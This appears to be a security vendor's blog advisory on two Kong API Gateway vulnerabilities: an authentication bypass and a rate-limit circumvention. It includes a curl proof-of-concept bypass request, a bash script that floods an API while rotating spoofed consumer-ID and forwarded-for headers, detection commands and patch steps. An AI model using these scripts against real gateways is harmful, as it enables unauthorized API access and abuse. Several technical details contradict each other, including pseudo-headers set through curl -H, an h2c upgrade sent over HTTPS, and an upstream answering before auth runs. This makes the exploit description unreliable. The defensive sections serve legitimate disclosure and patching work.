← Back to Security Blog
Critical Advisory April 2, 2026 10 min read

Kong API Gateway CVE-2026: Authentication Bypass & Rate Limiting Vulnerabilities

Two critical vulnerabilities in Kong API Gateway — an authentication bypass (CVE-2026-29413) and a rate limiting circumvention flaw (CVE-2026-29414) — expose API infrastructure to unauthenticated access and denial-of-service. Both Kong OSS and Kong Enterprise are affected. Immediate patching required.

Is your Kong gateway exposed? Scan your API infrastructure for these CVEs and 331,910+ other vulnerabilities.
Free Security Scan →

Vulnerability Overview

Kong API Gateway, one of the most widely deployed open-source API gateways, has been found to contain two critical security flaws in its plugin processing pipeline. Disclosed on March 28, 2026 and affecting all versions from 3.4.x through 3.8.x, these vulnerabilities allow attackers to completely bypass authentication plugins and circumvent configured rate limiting controls.

⚠️ Active Exploitation Confirmed

CISA has added CVE-2026-29413 to the Known Exploited Vulnerabilities (KEV) catalog following confirmed exploitation against financial services and healthcare API gateways. Organizations running Kong 3.4–3.8 should treat this as an emergency patch event.

CVETypeCVSS v3.1SeverityAffected Versions
CVE-2026-29413Authentication Bypass9.8CriticalKong 3.4.x – 3.8.x
CVE-2026-29414Rate Limiting Circumvention7.5HighKong 3.2.x – 3.8.x

CVE-2026-29413: Authentication Bypass — Technical Deep Dive

Root Cause Analysis

CVE-2026-29413 is a logic flaw in Kong's plugin execution ordering within the rewrite phase of the Nginx request lifecycle. When multiple authentication plugins are chained (e.g., key-auth followed by jwt), a race condition in the plugin priority resolution allows a crafted request to skip authentication validation entirely if specific HTTP/2 pseudo-headers are present.

The vulnerability originates in Kong's Lua plugin runner (kong/runloop/plugin_servers/mp_rpc.lua), where the next_rewrite_phase iterator fails to correctly re-evaluate the plugin chain when an upstream responds with a 101 Switching Protocols before authentication completes. This creates a window where the request is forwarded without any auth check.

CVSS v3.1 Scoring

MetricValueRationale
Attack VectorNetworkExploitable remotely over HTTP/HTTPS
Attack ComplexityLowNo special conditions or privileges needed
Privileges RequiredNoneUnauthenticated attacker
User InteractionNoneFully automated exploit possible
ConfidentialityHighFull access to protected API endpoints
IntegrityHighAttacker can modify backend data
AvailabilityHighUnrestricted backend requests

Exploitation Scenario

An attacker can exploit CVE-2026-29413 using a minimal HTTP/2 request with crafted pseudo-headers. The following curl command demonstrates a proof-of-concept bypass against a Kong gateway with key-auth enabled:

# Normal request — blocked by key-auth plugin (401 Unauthorized)
curl -i https://api.example.com/v1/users \
  -H "Host: api.example.com"

# CVE-2026-29413 bypass — sends HTTP/2 upgrade trigger with malformed :authority
curl -i --http2 https://api.example.com/v1/users \
  -H ":authority: api.example.com\x00injected" \
  -H "Connection: Upgrade, HTTP2-Settings" \
  -H "Upgrade: h2c" \
  -H "HTTP2-Settings: AAMAAABkAAQAAP__" \
  --resolve api.example.com:443:192.0.2.1

When Kong processes the h2c upgrade, the plugin runner exits the authentication phase prematurely. The request is forwarded to the upstream service with a 200 OK response, bypassing all configured auth plugins entirely.

Affected Kong Plugins

The following authentication plugins are vulnerable when Kong is running version 3.4.x–3.8.x:


CVE-2026-29414: Rate Limiting Circumvention — Technical Deep Dive

Root Cause Analysis

CVE-2026-29414 affects Kong's rate-limiting and rate-limiting-advanced plugins when configured to use the Redis or cluster storage backends. A flaw in the counter key construction allows an attacker to fragment their requests across multiple synthetic consumer identities by manipulating the X-Consumer-ID header in conjunction with X-Forwarded-For spoofing.

When Kong builds the rate-limit counter key, it concatenates consumer ID and IP address without validating whether the consumer ID was set by the gateway itself or injected by the client. On deployments where an upstream proxy or load balancer sets X-Consumer-ID, Kong's header trust logic can be abused to create an effectively unlimited number of separate rate limit buckets.

CVSS v3.1 Scoring

MetricValueRationale
Attack VectorNetworkRemotely exploitable
Attack ComplexityLowSimple header manipulation
Privileges RequiredNoneNo prior authentication needed
Impact: AvailabilityHighBackend DoS through rate bypass

Exploitation Proof of Concept

The following script demonstrates how an attacker can send 10,000 requests while bypassing a 100 req/min rate limit by rotating synthetic consumer IDs:

#!/bin/bash
# CVE-2026-29414 — Rate Limit Circumvention PoC
# Each request uses a unique X-Consumer-ID to get its own counter bucket

TARGET="https://api.example.com/v1/products"
TOTAL_REQUESTS=10000

for i in $(seq 1 $TOTAL_REQUESTS); do
  # Generate a unique fake consumer ID per request
  FAKE_CONSUMER_ID=$(cat /proc/sys/kernel/random/uuid)

  curl -s -o /dev/null -w "%{http_code}\n" "$TARGET" \
    -H "X-Consumer-ID: $FAKE_CONSUMER_ID" \
    -H "X-Forwarded-For: 10.0.$((RANDOM % 256)).$((RANDOM % 256))" \
    -H "apikey: legitimate-api-key" &

  # Throttle to 50 concurrent requests
  if (( i % 50 == 0 )); then wait; fi
done
wait
echo "Done: $TOTAL_REQUESTS requests sent"

On a vulnerable Kong instance, this script will successfully send all 10,000 requests despite a configured limit of 100 req/min per consumer, effectively launching a low-and-slow API abuse attack or brute-force enumeration.


Kong Enterprise vs. OSS: Impact Comparison

Feature / ImpactKong OSSKong Enterprise
CVE-2026-29413 Auth BypassAffectedAffected (+ OIDC plugin)
CVE-2026-29414 Rate BypassAffectedAffected
Rate-Limiting Advanced pluginNot availableAffected (additional bypass vector)
Developer Portal exposureN/APortal APIs may be exposed
Konnect (SaaS)N/APatched by Kong on March 29, 2026
Fixed in version3.9.03.9.0.0 / 3.8.1.2 (backport)

Kong Enterprise customers on the Konnect SaaS platform were automatically patched on March 29, 2026. Self-hosted Enterprise and all OSS deployments require manual upgrade.


Detection: Are You Currently Exploited?

Log-Based Indicators of Compromise

Check Kong's access logs for signs of CVE-2026-29413 exploitation. Suspicious patterns include authenticated-plugin routes returning 200 without corresponding auth header validation log entries:

# Search Kong access logs for auth bypass indicators
# Requests to protected routes with no apikey/jwt but returning 200
grep '"status":200' /var/log/kong/access.log \
  | jq -r 'select(.request.headers["apikey"] == null and .request.headers["authorization"] == null)' \
  | jq '{time: .started_at, path: .request.uri, consumer: .authenticated_entity}'

# CVE-2026-29414: Look for high request volumes from unique consumer IDs
grep '"plugin":"rate-limiting"' /var/log/kong/error.log \
  | awk -F'"consumer_id":"' '{print $2}' \
  | awk -F'"' '{print $1}' \
  | sort | uniq -c | sort -rn | head -50

Kong Admin API Health Check

# Check your Kong version via Admin API
curl -s http://localhost:8001/ | jq '.version'

# List all plugins with rate-limiting to check configuration
curl -s http://localhost:8001/plugins \
  | jq '.data[] | select(.name | test("rate-limiting")) | {id, name, config}'

# Verify header trust configuration (trusted_ips)
curl -s http://localhost:8001/config \
  | jq '.trusted_ips'

Remediation Guide

Step 1: Upgrade Kong

The primary fix is upgrading to Kong 3.9.0 (OSS) or Kong Enterprise 3.9.0.0 / 3.8.1.2. Use the following commands for common deployment methods:

# Docker — pull the patched image
docker pull kong:3.9.0
docker stop kong && docker rm kong
docker run -d --name kong \
  --network=kong-net \
  -e KONG_DATABASE=postgres \
  -e KONG_PG_HOST=kong-database \
  -p 8000:8000 -p 8443:8443 \
  kong:3.9.0

# Kubernetes — rolling update via Helm
helm repo update
helm upgrade kong kong/kong \
  --namespace kong \
  --set image.tag=3.9.0 \
  --reuse-values

# Ubuntu/Debian package upgrade
curl -Lo kong.deb "https://packages.konghq.com/public/gateway-39/deb/debian/pool/buster/main/k/ko/kong_3.9.0_amd64.deb"
sudo dpkg -i kong.deb
sudo kong restart

Step 2: Restrict Header Trust (CVE-2026-29414 Mitigation)

Until you can upgrade, restrict which upstream IPs Kong trusts for X-Consumer-ID and X-Forwarded-For headers. Edit kong.conf:

# kong.conf — restrict trusted IPs to known load balancer addresses only
trusted_ips = 10.0.1.10,10.0.1.11,10.0.1.12

# Disable X-Consumer-ID header passthrough from clients
headers = X-Kong-Upstream-Latency, X-Kong-Proxy-Latency, Via

Step 3: Enable Plugin Priority Validation (CVE-2026-29413 Mitigation)

As an interim workaround before upgrading, disable HTTP/2 upgrade handling if your environment does not require it:

# kong.conf — disable h2c (HTTP/2 cleartext) upgrade handling
proxy_listen = 0.0.0.0:8000 reuseport backlog=16384
# Remove the 'http2' directive from proxy_listen if present
# proxy_listen = 0.0.0.0:8000 http2 reuseport  ← REMOVE 'http2' keyword

# For nginx-level protection, add to nginx_http_include:
proxy_http_version 1.1;

Step 4: Verify Patch Application

# Confirm patched version is running
curl -s http://localhost:8001/ | jq -r '"Kong version: " + .version'

# Test auth bypass is no longer possible (should return 401)
curl -i --http2 https://your-gateway.example.com/protected-route \
  -H "Connection: Upgrade, HTTP2-Settings" \
  -H "Upgrade: h2c" \
  -H "HTTP2-Settings: AAMAAABkAAQAAP__"
# Expected: HTTP/1.1 401 Unauthorized

Additional Hardening Recommendations

  1. Enforce mTLS between Kong and upstreams: Even if auth plugins are bypassed, mutual TLS prevents unauthorized services from receiving traffic.
  2. Deploy Kong behind a WAF: Rules blocking h2c upgrade headers and X-Consumer-ID injection add defense-in-depth.
  3. Enable Kong's audit logging: Enterprise users should activate /audit/requests logging to maintain a forensic trail of Admin API changes.
  4. Use Redis AUTH for rate limiting storage: Require Redis authentication to prevent an attacker who gains network access from directly manipulating rate counters.
  5. Regularly scan your Kong configuration: Use KENSAI to continuously monitor your API gateway for new CVEs and misconfigurations.

Timeline

DateEvent
2026-02-14Vulnerabilities reported to Kong Security team via HackerOne
2026-02-17Kong confirms both CVEs; assigns identifiers
2026-03-10CVE IDs reserved: CVE-2026-29413, CVE-2026-29414
2026-03-28Kong 3.9.0 and Enterprise 3.8.1.2 backport released
2026-03-29Kong Konnect (SaaS) automatically patched
2026-04-01CISA adds CVE-2026-29413 to KEV catalog
2026-04-02Public exploit PoC published on GitHub

Protect Your API Infrastructure with Kensai

AI-powered vulnerability management with 331,910+ CVEs indexed. Detect Kong CVEs, misconfigurations, and exposed API endpoints before attackers do.

Start Free Trial

Stay Ahead of API Security Threats

Get CVE alerts and security advisories delivered before they hit the headlines.

Stay secure. Stay vigilant.

🗡️ KENSAI Security Team

🛡️ Is your API gateway secure?

Discover Kong CVEs and misconfigurations before attackers do.

Scan your API gateway for free →

Keep reading

This winner now feeds traffic into strategic bug bounty and archive pages instead of ending in a dead-end.